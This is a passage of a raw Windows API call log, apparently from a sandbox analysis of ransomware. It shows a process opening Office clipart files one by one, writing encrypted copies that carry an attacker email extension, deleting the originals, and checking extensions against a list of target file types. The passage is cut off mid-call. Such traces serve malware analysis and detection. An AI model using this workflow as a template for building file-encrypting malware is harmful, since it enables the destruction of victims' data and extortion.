lstrlenW (lpString="FD02088_.WMF") returned 12 [0271.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.819] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3696) returned 1 [0271.819] CloseHandle (hObject=0x390) returned 1 [0271.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf")) returned 0x20 [0271.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.819] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.819] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.820] GetLastError () returned 0x0 [0271.820] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xe70, lpOverlapped=0x0) returned 1 [0271.821] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xe80, lpOverlapped=0x0) returned 1 [0271.822] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.822] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.822] SetEndOfFile (hFile=0x2a8) returned 1 [0271.822] CloseHandle (hObject=0x2a8) returned 1 [0271.822] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.822] SetEndOfFile (hFile=0x390) returned 1 [0271.824] CloseHandle (hObject=0x390) returned 1 [0271.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.824] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf")) returned 1 [0271.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.825] lstrlenW (lpString=".doc") returned 4 [0271.825] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.825] lstrlenW (lpString=".docx") returned 5 [0271.825] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.825] lstrlenW (lpString=".pdf") returned 4 [0271.825] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.825] lstrlenW (lpString=".xls") returned 4 [0271.825] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.825] lstrlenW (lpString=".xlsx") returned 5 [0271.825] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.825] lstrlenW (lpString=".ppt") returned 4 [0271.825] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.825] lstrlenW (lpString=".zip") returned 4 [0271.825] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.825] lstrlenW (lpString=".rar") returned 4 [0271.825] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.825] lstrlenW (lpString=".bz2") returned 4 [0271.825] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.825] lstrlenW (lpString=".7z") returned 3 [0271.825] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.825] lstrlenW (lpString=".dbf") returned 4 [0271.825] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.825] lstrlenW (lpString=".1cd") returned 4 [0271.826] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.826] lstrlenW (lpString=".jpg") returned 4 [0271.826] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.826] lstrlenW (lpString=".doc") returned 4 [0271.826] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString=".docx") returned 5 [0271.826] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.826] lstrlenW (lpString=".pdf") returned 4 [0271.826] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString=".xls") returned 4 [0271.826] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.826] lstrlenW (lpString=".xlsx") returned 5 [0271.826] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.826] lstrlenW (lpString=".ppt") returned 4 [0271.826] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.826] lstrlenW (lpString=".zip") returned 4 [0271.826] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.826] lstrlenW (lpString=".rar") returned 4 [0271.826] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString=".bz2") returned 4 [0271.826] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString=".7z") returned 3 [0271.826] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.826] lstrlenW (lpString=".dbf") returned 4 [0271.826] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.827] lstrlenW (lpString=".1cd") returned 4 [0271.827] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63 [0271.827] lstrlenW (lpString=".jpg") returned 4 [0271.827] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.827] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.827] lstrlenW (lpString="FD02097_.WMF") returned 12 [0271.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.827] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1564) returned 1 [0271.827] CloseHandle (hObject=0x390) returned 1 [0271.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf")) returned 0x20 [0271.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.828] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.828] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.828] GetLastError () returned 0x0 [0271.828] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x61c, lpOverlapped=0x0) returned 1 [0271.829] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x620, lpOverlapped=0x0) returned 1 [0271.830] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.830] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.830] SetEndOfFile (hFile=0x2a8) returned 1 [0271.830] CloseHandle (hObject=0x2a8) returned 1 [0271.830] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.830] SetEndOfFile (hFile=0x390) returned 1 [0271.832] CloseHandle (hObject=0x390) returned 1 [0271.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.833] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf")) returned 1 [0271.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.833] lstrlenW (lpString=".doc") returned 4 [0271.833] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.833] lstrlenW (lpString=".docx") returned 5 [0271.833] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.833] lstrlenW (lpString=".pdf") returned 4 [0271.833] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.833] lstrlenW (lpString=".xls") returned 4 [0271.833] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.833] lstrlenW (lpString=".xlsx") returned 5 [0271.833] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.833] lstrlenW (lpString=".ppt") returned 4 [0271.833] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.833] lstrlenW (lpString=".zip") returned 4 [0271.833] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.833] lstrlenW (lpString=".rar") returned 4 [0271.833] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.833] lstrlenW (lpString=".bz2") returned 4 [0271.833] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.833] lstrlenW (lpString=".7z") returned 3 [0271.833] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.833] lstrlenW (lpString=".dbf") returned 4 [0271.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.834] lstrlenW (lpString=".1cd") returned 4 [0271.834] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.834] lstrlenW (lpString=".jpg") returned 4 [0271.834] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.834] lstrlenW (lpString=".doc") returned 4 [0271.834] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString=".docx") returned 5 [0271.834] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.834] lstrlenW (lpString=".pdf") returned 4 [0271.834] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString=".xls") returned 4 [0271.834] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.834] lstrlenW (lpString=".xlsx") returned 5 [0271.834] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.834] lstrlenW (lpString=".ppt") returned 4 [0271.834] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.834] lstrlenW (lpString=".zip") returned 4 [0271.834] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.834] lstrlenW (lpString=".rar") returned 4 [0271.834] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString=".bz2") returned 4 [0271.834] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.834] lstrlenW (lpString=".7z") returned 3 [0271.835] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.835] lstrlenW (lpString=".dbf") returned 4 [0271.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.835] lstrlenW (lpString=".1cd") returned 4 [0271.835] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63 [0271.835] lstrlenW (lpString=".jpg") returned 4 [0271.835] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.835] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.835] lstrlenW (lpString="FD02115_.WMF") returned 12 [0271.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.836] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=4660) returned 1 [0271.836] CloseHandle (hObject=0x390) returned 1 [0271.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf")) returned 0x20 [0271.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.836] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.836] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.838] GetLastError () returned 0x0 [0271.838] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1234, lpOverlapped=0x0) returned 1 [0271.840] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1240, lpOverlapped=0x0) returned 1 [0271.841] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.841] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.841] SetEndOfFile (hFile=0x2a8) returned 1 [0271.841] CloseHandle (hObject=0x2a8) returned 1 [0271.841] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.841] SetEndOfFile (hFile=0x390) returned 1 [0271.844] CloseHandle (hObject=0x390) returned 1 [0271.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.844] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf")) returned 1 [0271.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.844] lstrlenW (lpString=".doc") returned 4 [0271.844] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.844] lstrlenW (lpString=".docx") returned 5 [0271.844] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.844] lstrlenW (lpString=".pdf") returned 4 [0271.844] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.844] lstrlenW (lpString=".xls") returned 4 [0271.844] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.845] lstrlenW (lpString=".xlsx") returned 5 [0271.845] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.845] lstrlenW (lpString=".ppt") returned 4 [0271.845] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.845] lstrlenW (lpString=".zip") returned 4 [0271.845] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.845] lstrlenW (lpString=".rar") returned 4 [0271.845] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString=".bz2") returned 4 [0271.845] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString=".7z") returned 3 [0271.845] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.845] lstrlenW (lpString=".dbf") returned 4 [0271.845] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.845] lstrlenW (lpString=".1cd") returned 4 [0271.845] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.845] lstrlenW (lpString=".jpg") returned 4 [0271.845] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.845] lstrlenW (lpString=".doc") returned 4 [0271.845] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.845] lstrlenW (lpString=".docx") returned 5 [0271.845] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.845] lstrlenW (lpString=".pdf") returned 4 [0271.845] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.846] lstrlenW (lpString=".xls") returned 4 [0271.846] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.846] lstrlenW (lpString=".xlsx") returned 5 [0271.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.846] lstrlenW (lpString=".ppt") returned 4 [0271.846] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.846] lstrlenW (lpString=".zip") returned 4 [0271.846] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.846] lstrlenW (lpString=".rar") returned 4 [0271.846] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.846] lstrlenW (lpString=".bz2") returned 4 [0271.846] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.846] lstrlenW (lpString=".7z") returned 3 [0271.846] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.846] lstrlenW (lpString=".dbf") returned 4 [0271.846] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.846] lstrlenW (lpString=".1cd") returned 4 [0271.846] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63 [0271.846] lstrlenW (lpString=".jpg") returned 4 [0271.846] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.846] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.846] lstrlenW (lpString="FD02116_.WMF") returned 12 [0271.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.847] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3988) returned 1 [0271.847] CloseHandle (hObject=0x390) returned 1 [0271.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 